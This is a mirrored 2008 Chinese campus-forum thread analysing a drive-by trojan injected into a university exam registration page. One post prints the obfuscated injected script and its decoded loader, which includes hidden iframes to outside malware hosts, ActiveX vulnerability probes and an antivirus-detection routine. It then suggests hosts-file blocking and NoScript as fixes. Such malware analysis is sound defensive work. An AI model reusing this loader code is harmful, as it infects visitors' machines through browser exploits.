BBYR Achieve
返回信息流
这是一条镜像帖。来源:北邮人论坛 / security / #16435同步于 2008/3/18
该镜像源已超过 30 天没有更新,可能在源站已被删除。
Security机器人发帖

[合集] 谁在四六级报名网页设了毒?

flyingkisser
2008/3/18镜像同步1 回复
☆─────────────────────────────────────☆ lisz007 (黑马骑士) 于 (Wed Mar 12 22:40:36 2008) 提到: http://www.jwc.bupt.cn/cet46/cet.asp 估计是被B4的MAN干的 ☆─────────────────────────────────────☆ dickfu (潇湘天下|小付寨主) 于 (Thu Mar 13 08:50:03 2008) 提到: 教务处的网站上都有马 ☆─────────────────────────────────────☆ coolnike1212 (糖糖) 于 (Thu Mar 13 09:02:21 2008) 提到: 服了..... ☆─────────────────────────────────────☆ wowo (我) 于 (Thu Mar 13 09:36:35 2008) 提到: 有么 ☆─────────────────────────────────────☆ caprice (矩阵实验室) 于 (Thu Mar 13 10:09:21 2008) 提到: 可疑挂马语句: ----------------------------------------------我是很傻很天真的代码分割线---------------------------------------------- <script>document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x4F\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\x25\x35\x33\x25\x36\x35\x25\x37\x32\x76\x2E\x25\x34\x33\x25\x36\x46\x25\x34\x44\x2F\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");</script> ----------------------------------------------我是很傻很天真的代码分割线---------------------------------------------- 解码后: ----------------------------------------------我是很傻很天真的代码分割线---------------------------------------------- <script src="http://office.faqserv.com/FAQ.js"></script> ----------------------------------------------我是很傻很天真的代码分割线---------------------------------------------- 顺藤摸瓜,跟过去 FAQ.js的源码如下: ----------------------------------------------我是很傻很天真的代码分割线---------------------------------------------- eval("\166\141\162\40\124\150\145\156\40\75\40\156\145\167\40\104\141\164\145\50\51\73\15\12\124\150\145\156\56\163\145\164\124\151\155\145\50\124\150\145\156\56\147\145\164\124\151\155\145\50\51\40\53\40\63\60\52\66\60\52\61\60\60\60\40\51\73\40\15\12\166\141\162\40\143\157\157\153\151\145\123\164\162\151\156\147\40\75\40\156\145\167\40\123\164\162\151\156\147\50\144\157\143\165\155\145\156\164\56\143\157\157\153\151\145\51\73\15\12\166\141\162\40\143\157\157\153\151\145\110\145\141\144\145\162\40\75\40\47\141\153\170\170\47\40\73\15\12\166\141\162\40\142\145\147\151\156\120\157\163\151\164\151\157\156\40\75\40\143\157\157\153\151\145\123\164\162\151\156\147\56\151\156\144\145\170\117\146\50\143\157\157\153\151\145\110\145\141\144\145\162\51\73"); if (beginPosition == -1) { document.write('<iframe height="0" frameborder="1" src="http://www.59.vc/page/add_54738542.htm" width="10" ></iframe>'); document.write('<iframe height="0" frameborder="1" src="http://office.faqserv.com/faq.htm" width="10" ></iframe>'); document.cookie = "Cookieakxx=akxx;expires="+ Then.toGMTString() +";path=/"; } ----------------------------------------------我是很傻很天真的代码分割线---------------------------------------------- 其中上面的eval函数等价于以下代码: ----------------------------------------------我是很傻很天真的代码分割线---------------------------------------------- var Then = new Date(); Then.setTime(Then.getTime() + 30*60*1000 ); var cookieString = new String(document.cookie); var cookieHeader = 'akxx' ; var beginPosition = cookieString.indexOf(cookieHeader); ----------------------------------------------我是很傻很天真的代码分割线---------------------------------------------- 现在再来看看eval后面的代码 其中http://www.59.vc/page/add_54738542.htm是两行js ----------------------------------------------我是很傻很天真的代码分割线---------------------------------------------- <script src=addr.js></script> <script language="javascript" type="text/javascript" src="http://js.users.51.la/1542776.js"></script> ----------------------------------------------我是很傻很天真的代码分割线---------------------------------------------- http://office.faqserv.com/faq.htm就是一行js ----------------------------------------------我是很傻很天真的代码分割线---------------------------------------------- <script language="javascript" src="http://count18.51yes.com/click.aspx?id=189404354&logo=1"></script> ----------------------------------------------我是很傻很天真的代码分割线---------------------------------------------- 上面的js.users.51.la和count18.51yes.com是两个网站流量统计服务 addr.js代码如下: ----------------------------------------------我是很傻很天真的代码分割线---------------------------------------------- eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1y G(){1x(i=2;i<1w;i++){a t=4 Y();a s=4 Y();a u=H.1v(1u+i);t.6="X:@W:"+u+":\\\\V%U\\\\q%T\\\\q%S%R%1t.0\\\\Q\\\\P.O::/N/M.9";s.6="X:@W:"+u+":\\\\V%U\\\\q%T\\\\q%S%R%1s.0\\\\Q\\\\P.O::/N/M.9";5(t.L==K||s.L==K)J 1r}J 1q}a p=4 1p();p.1o(p.1n()+1m*I*I*1l);a F=4 H(8.D);a E="C=";5(!G()&&F.B(E)==-1){l{5(4 o("1k.1j"+"1i"+"1h.1"))8.k(\'<3 j=n:h 6="f://m.c/1g.9"></3>\')}b(e){}l{5(4 o("1f.1e"))8.k(\'<3 j=n:h 6="f://m.c/1d.9"></3>\')}b(e){}8.D="C=1c;1b="+p.1a();z="y";l{5(19.17.16().B("A"+"15 7")==-1)8.k(\'<3 j=n:h 6="f://m.c/A.9"></3>\')}b(e){}z="y";l{5(4 o("x"+"v"+".x"+"v.1"))8.k(\'<3 j=d\'+\'14\'+\'13:h 6="f://w\'+\'18\'+\'.c/r\'+\'12.g\'+\'5"></3>\')}b(e){}l{5(4 o("11.10.1"))8.k(\'<3 j=n:h 6="f://m.c/Z.9"></3>\')}b(e){}}',62,97,'|||iframe|new|if|src||document|gif|var|catch|vg|||http||none||style|write|try|w18|display|ActiveXObject|Then|Kaspersky||bbbbbbbbbbbkis7|bbbbbbbbkis6|root|PCtl||IER|fjsadlfjlasdflkasjdf8i789582763495287|fdasfasfasdfa|ms|indexOf|Cookie1|cookie|cookieHeader|fdsafasdfasdfcookie|bIsKIS|String|60|return|41|height|help|images|chm|context|Doc|20Security|20Internet|20Lab|20Files|Program|MSITStore|mk|Image|lz|GLChatCtrl|GLCHAT|eal|lay|isp|ie|toLowerCase|userAgent||navigator|toGMTString|expires|POPWINDOS|xl|Vod|DPClient|bf|layer|ormP|St|MPS|1000|24|getTime|setTime|Date|false|true|207|206|65|fromCharCode|26|for|function'.split('|'),0,{})) ----------------------------------------------我是很傻很天真的代码分割线---------------------------------------------- 上面的这段代码明显使用了js代码压缩技术,如果我没有判断错的话,应该使用的是Dean Edwards的jspacker程序。 “解压”这段代码后得到了原始的js代码,如下: ----------------------------------------------我是很傻很天真的代码分割线---------------------------------------------- function bIsKIS(){ for(i=2;i<26;i++){ var bbbbbbbbkis6=new Image(); var bbbbbbbbbbbkis7=new Image(); var root=String.fromCharCode(65+i); bbbbbbbbkis6.src="mk:@MSITStore:"+root+":\\Program%20Files\\Kaspersky%20Lab\\Kaspersky%20Internet%20Security%206.0\\Doc\\context.chm::/images/help.gif"; bbbbbbbbbbbkis7.src="mk:@MSITStore:"+root+":\\Program%20Files\\Kaspersky%20Lab\\Kaspersky%20Internet%20Security%207.0\\Doc\\context.chm::/images/help.gif"; if(bbbbbbbbkis6.height==41||bbbbbbbbbbbkis7.height==41) return true } return false } var Then=new Date(); Then.setTime(Then.getTime()+24*60*60*1000); var fdsafasdfasdfcookie=new String(document.cookie); var cookieHeader="Cookie1="; if(!bIsKIS()&&fdsafasdfasdfcookie.indexOf(cookieHeader)==-1) { try { if(new ActiveXObject("MPS.St"+"ormP"+"layer.1")) document.write('<iframe style=display:none src="http://w18.vg/bf.gif"></iframe>') } catch(e){} try{ if(new ActiveXObject("DPClient.Vod")) document.write('<iframe style=display:none src="http://w18.vg/xl.gif"></iframe>') } catch(e){} document.cookie="Cookie1=POPWINDOS;expires="+Then.toGMTString(); fdasfasfasdfa="fjsadlfjlasdflkasjdf8i789582763495287"; try{ if(navigator.userAgent.toLowerCase().indexOf("ms"+"ie 7")==-1) document.write('<iframe style=display:none src="http://w18.vg/ms.gif"></iframe>') } catch(e){} fdasfasfasdfa="fjsadlfjlasdflkasjdf8i789582763495287"; try{if(new ActiveXObject("IER"+"PCtl"+".IER"+"PCtl.1")) document.write('<iframe style=d'+'isp'+'lay:none src="http://w'+'18'+'.vg/r'+'eal.g'+'if"></iframe>')} catch(e){}try{if(new ActiveXObject("GLCHAT.GLChatCtrl.1")) document.write('<iframe style=display:none src="http://w18.vg/lz.gif"></iframe>')} catch(e){}} ----------------------------------------------我是很傻很天真的代码分割线---------------------------------------------- 初步分析,是利用暴风影音的漏洞进行网页挂马,然后使用51.la和51yes.com的网站流量统计去记录所有被感染用户的IP地址等信息 简单的解决方法1: 修改C:\WINDOWS\system32\drivers\etc\hosts 添加以下记录到该文件: 127.0.0.1 office.faqserv.com 127.0.0.1 w18.vg 127.0.0.1 js.users.51.la 127.0.0.1 www.59.vc 127.0.0.1 count18.51yes.com 简单的解决方法2: 不要使用IE浏览4/6级报名网站,使用Firefox+NoScript 后记: 这个网马有点意思,还有判断本机是否安装KIS6/7的功能模块,很黄很暴力! ☆─────────────────────────────────────☆ yeah (ys) 于 (Thu Mar 13 10:25:53 2008) 提到: 牛人啊! 【 在 caprice 的大作中提到: 】 3\x25\x36\x46\x25\x34\x44\x2F\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");</script> ☆─────────────────────────────────────☆ Bluerainer (Blue) 于 (Thu Mar 13 10:31:57 2008) 提到: 大牛啊 ☆─────────────────────────────────────☆ lg200303 (slight) 于 (Thu Mar 13 10:52:05 2008) 提到: ding ☆─────────────────────────────────────☆ illuming (明明) 于 (Thu Mar 13 10:58:50 2008) 提到: 牛人 ☆─────────────────────────────────────☆ montelurker (猫囧) 于 (Thu Mar 13 11:41:04 2008) 提到: .....牛人 ☆─────────────────────────────────────☆ wanlxp (情淮徽皖-万里雪飘) 于 (Thu Mar 13 11:57:01 2008) 提到: 厉害 ☆─────────────────────────────────────☆ flyingkisser (齐天大猫) 于 (Thu Mar 13 12:23:32 2008) 提到: 分析的不错,不过不能肯定就是这个站被挂了,也有可能是ARP挂上的, 不管怎么说,很讽刺。 ☆─────────────────────────────────────☆ beyondlove (beyond everything) 于 (Thu Mar 13 12:36:36 2008) 提到: 大牛 ☆─────────────────────────────────────☆ gentlebreeze (smile) 于 (Thu Mar 13 12:51:01 2008) 提到: 暂时啥也不知道 ☆─────────────────────────────────────☆ wyt000 (快乐的) 于 (Thu Mar 13 13:14:18 2008) 提到: 确实有毒 太可恶了! ☆─────────────────────────────────────☆ brightyanxi (梅毒) 于 (Thu Mar 13 14:01:38 2008) 提到: 分析得太赞了 ☆─────────────────────────────────────☆ cocolusi (无事少上网,闲来多读书) 于 (Thu Mar 13 14:20:49 2008) 提到: 强 ☆─────────────────────────────────────☆ rebirthatsix (茫犭者) 于 (Thu Mar 13 14:51:27 2008) 提到: 支持doc! ☆─────────────────────────────────────☆ sunboyno1 (阳光的味道) 于 (Thu Mar 13 16:07:41 2008) 提到: 神人啊 ☆─────────────────────────────────────☆ wowo (我) 于 (Thu Mar 13 16:58:46 2008) 提到: 哇塞~~~~~ ☆─────────────────────────────────────☆ nioxt (没意思) 于 (Thu Mar 13 17:16:28 2008) 提到: 【 在 caprice 的大作中提到: 】 3\x25\x36\x46\x25\x34\x44\x2F\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");</script> 服了...赞大牛 ☆─────────────────────────────────────☆ maruchen (Ken) 于 (Thu Mar 13 17:19:12 2008) 提到: 这个不得不顶 ☆─────────────────────────────────────☆ Materazzi (㊣猪猪楼下素猪联盟㊣马特拉齐♂) 于 (Thu Mar 13 19:06:33 2008) 提到: 真棒! ☆─────────────────────────────────────☆ bylee (bylee) 于 (Thu Mar 13 19:16:13 2008) 提到: 牛人~~~~~~~ ☆─────────────────────────────────────☆ elizabeth (蜗牛) 于 (Thu Mar 13 19:30:02 2008) 提到: 晕,下午刚登陆报名了。怎么办? ☆─────────────────────────────────────☆ ganlanbaby (congcong) 于 (Thu Mar 13 21:07:23 2008) 提到: 呵呵,我的卡巴把它干掉了... ☆─────────────────────────────────────☆ hyu35 (iMyYear) 于 (Thu Mar 13 21:24:11 2008) 提到: 真的么? ☆─────────────────────────────────────☆ interqsh (清晨) 于 (Thu Mar 13 21:59:02 2008) 提到: 牛人 ☆─────────────────────────────────────☆ agui (桥中,海中,北游) 于 (Thu Mar 13 22:25:49 2008) 提到: 这个~~ ☆─────────────────────────────────────☆ sarahsdad (水很淡) 于 (Thu Mar 13 22:28:18 2008) 提到: 。。怎么办 ☆─────────────────────────────────────☆ youyang (youyang) 于 (Thu Mar 13 22:55:20 2008) 提到: 牛 ☆─────────────────────────────────────☆ LostInSy (LostInSy) 于 (Sat Mar 15 19:33:50 2008) 提到: 牛人啊 ☆─────────────────────────────────────☆ kobe9 (kobe.shevchenko) 于 (Sun Mar 16 22:34:46 2008) 提到: Dr. H~~~ 【 在 caprice 的大作中提到: 】 3\x25\x36\x46\x25\x34\x44\x2F\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");</script> ☆─────────────────────────────────────☆ wanlxp (情淮徽皖-万里雪飘) 于 (Sun Mar 16 23:08:29 2008) 提到: 话说应该在IE里面禁用脚本就可以了吧
订阅后,新回复会通过你的通知中心匿名送达。
1 条回复
cherrug机器人#1 · 2008/3/19
http://bbs.51js.com/thread-74987-1-1.html 可以看下自己都有几个